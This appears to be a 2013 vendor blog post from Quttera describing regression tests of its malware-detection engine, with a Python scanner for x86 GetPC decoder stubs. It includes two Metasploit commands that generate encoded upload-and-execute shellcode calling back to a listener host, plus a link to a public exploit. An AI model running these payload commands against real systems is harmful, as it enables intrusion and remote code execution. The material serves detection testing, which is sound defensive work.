18 Mar, 2013

Testing Of Malware Detection

Quttera, the leading provider of anti-malware services and solutions that protect business-critical information in the cloud, in hybrid environments and on-premises, builds innovative heuristic, behavioral and AI technologies into its scanning engine.

Metasploit is one of the best tools available for penetration testing and for generating exploits with payloads. It is an excellent framework for running field tests and quality checks of anti-malware software capabilities, in both manual and automated modes. Here is a nice quick reference guide to Metasploit covering its main features and commands.

For our core technology, the malicious content detection engine, it is critical that each engine module (especially the heuristic and behavior-based components) works together correctly while investigating and weighing the bits of code. Such a sophisticated, self-learning engine requires regular testing on a variety of samples to ensure that both performance and regression aspects are covered. In addition to the millions of URLs scanned for malware through our free public Online Website Malware Scanner, the engine continuously undergoes harness and functional tests on arbitrarily generated new malware samples of various kinds. This post is a small glance at specific (legacy) regression test cases picked from the quality assurance process we employ at Quttera Labs.
Investigation report for windows/upexec/find_tag shellcode encoded by x86/shikata_ga_nai encoder
Payload generation command:
msfpayload windows/upexec/find_tag LHOST=192.168.111.129 LPORT=9988 PEXEC=./ R | msfencode -e x86/shikata_ga_nai -t raw

Offset of the detected payload:
0

Payload emulation counters: [screenshot not included in this extraction]
Detection disassembly: [screenshots, parts 1-3, not included in this extraction]
Investigation report for windows/upexec/reverse_http encoded by x86/jmp_call_additive
Shellcode generation command:
msfpayload windows/upexec/reverse_http PEXEC=./ LHOST=127.0.0.1 LPORT=31337 R | msfencode -e x86/jmp_call_additive -t raw

Offset of the detected payload:
0

Payload emulation counters: [screenshot not included in this extraction]
Detection disassembly: [screenshots, parts 1-2, not included in this extraction]
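Both reports above flag the encoded stub at offset 0, i.e. at the decoder prologue itself. As an added example (not Quttera's engine code), the scanner below is a byte-level pre-filter for the three classic x86 "GetPC" constructs that self-decoding stubs such as shikata_ga_nai (fnstenv-based) and jmp_call_additive (jmp/call/pop) rely on to learn their own address, and it reports the offset of each hit. It assumes raw 32-bit code; the sample byte strings are hand-assembled for this example, not msfencode output, and the emulation step the engine uses to confirm a hit is not modelled.

```python
import struct

# Added example for this post, not Quttera's engine code: a byte-level
# pre-filter for the three classic x86 "GetPC" constructs that self-decoding
# stubs use to learn their own address. Assumed scope: 32-bit code, raw
# bytes; the emulation step that would confirm a hit is not modelled here.
FPU_ESCAPE = frozenset(range(0xD9, 0xE0))  # first byte of 2-byte x87 ops
FNSTENV_ESP_MINUS_C = b"\xd9\x74\x24\xf4"  # fnstenv [esp-0xc]
CALL_NEXT = b"\xe8\x00\x00\x00\x00"        # call $+5
POP_REG = frozenset(range(0x58, 0x60))     # pop eax .. pop edi


def find_getpc(data: bytes):
    """Return (offset, technique) for each GetPC stub found in data."""
    hits, n = [], len(data)
    for i in range(n):
        b = data[i]
        # x87 op (register form) ; fnstenv [esp-0xc]: saved env holds the op's EIP
        if (b in FPU_ESCAPE and i + 6 <= n and data[i + 1] >= 0xC0
                and data[i + 2:i + 6] == FNSTENV_ESP_MINUS_C):
            hits.append((i, "fnstenv"))
        # call $+5 ; pop reg: the pushed return address lands in a register
        elif data[i:i + 5] == CALL_NEXT and i + 5 < n and data[i + 5] in POP_REG:
            hits.append((i, "call_next"))
        # jmp short fwd ; pop reg ... ; call back to that pop: pop gets its address
        elif b == 0xEB and i + 2 < n and data[i + 1] < 0x80:
            tgt = i + 2 + data[i + 1]
            if tgt + 5 <= n and data[tgt] == 0xE8 and data[i + 2] in POP_REG:
                rel = struct.unpack_from("<i", data, tgt + 1)[0]
                if tgt + 5 + rel == i + 2:
                    hits.append((i, "jmp_call_pop"))
    return hits


# Constructed samples (hand-assembled, not msfencode output): four NOPs of
# padding, then a decoder-style prologue, then a couple of filler bytes.
SAMPLES = {
    "fnstenv_stub": b"\x90" * 4 + b"\xd9\xee" + FNSTENV_ESP_MINUS_C + b"\x5b\x31\xc0",
    "jmp_call_pop_stub": b"\x90" * 4 + b"\xeb\x03\x5e\x90\x90\xe8\xf8\xff\xff\xff",
    "call_next_stub": b"\x90" * 4 + CALL_NEXT + b"\x5f\x31\xc0",
    # plain prologue/epilogue: push ebp; mov ebp,esp; sub esp,0x10;
    # xor eax,eax; leave; ret -- must not be flagged
    "benign_code": b"\x55\x89\xe5\x83\xec\x10\x31\xc0\xc9\xc3",
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print(f"{name:18} -> {find_getpc(blob) or 'no GetPC stub'}")
```

Because the patterns are short byte sequences, arbitrary binary data (fonts, compressed streams) can trigger them by chance, which is why a heuristic hit like this is only a candidate for the emulation and disassembly stage shown in the reports.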
Investigation report for CoolPlayer+ Portable 2.19.2 exploit
Payload source:
hxxp://1337day.com/exploits/19116

Offset of the detected payload:
0

Payload emulation counters: [screenshot not included in this extraction]

Our technology provides in-depth visibility into the code and the intent of the identified suspicious components. It combines sophisticated classification and mathematical algorithms to detect cyber threats without the need for signatures, so it keeps up with constantly evolving malware. Contact us to schedule a demo or to find out how Quttera technology can help you protect your website and any other digital assets. Find out more about our products and services: https://quttera.com/